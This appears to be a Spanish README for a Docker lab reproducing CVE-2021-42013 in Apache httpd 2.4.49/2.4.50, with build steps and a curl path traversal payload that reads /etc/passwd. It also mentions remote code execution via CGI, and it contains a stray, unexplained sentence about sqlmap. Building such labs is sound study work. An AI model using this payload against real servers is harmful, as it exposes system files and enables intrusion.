
CVE: 2021-42013 Probado en: 2.4.49 y 2.4.50 Descripción: Vulnerabilidades de Path Traversal o Remote Code Execution en Apache 2.4.49 y 2.4.50
Este proyecto tiene como objetivo dockerizar una vulnerabilidad específica utilizando Docker. El objetivo es crear un entorno aislado en el cual la vulnerabilidad pueda ser explotada y probada de manera segura.
Apache HTTP Server 2.4.50 - Remote Code Execution && Path Transversal
Para ejecutar este proyecto, debe tener en su máquina:
Una vez instalados los requisitos, puede clonar este repositorio Git en su máquina:
git clone https://github.com/cybfar/cve-2021-42013-httpd.git
cd Ccve-2021-42013-httpd
Una vez en el directorio, ejecute el siguiente comando para configurar el entorno vulnerable:
docker build -t apache-httpd-vuln .
docker run -p 8000:80 apache-httpd-vuln
Luego acceda a la aplicación en la dirección http://localhost:8000 Si todo va bien, debería ver "It works"
La ejecución de este payload con curl a continuación nos muestra que el objetivo es vulnerable. El script generará el comando sqlmap apropiado para explotar la vulnerabilidad.
curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd
Este payload puede acceder directamente a la información relacionada con el usuario en el sistema sin el consentimiento del usuario.
Una vez que hayamos activado los mods cgi o cgid en el servidor, esta vulnerabilidad permitirá a un atacante ejecutar comandos arbitrarios.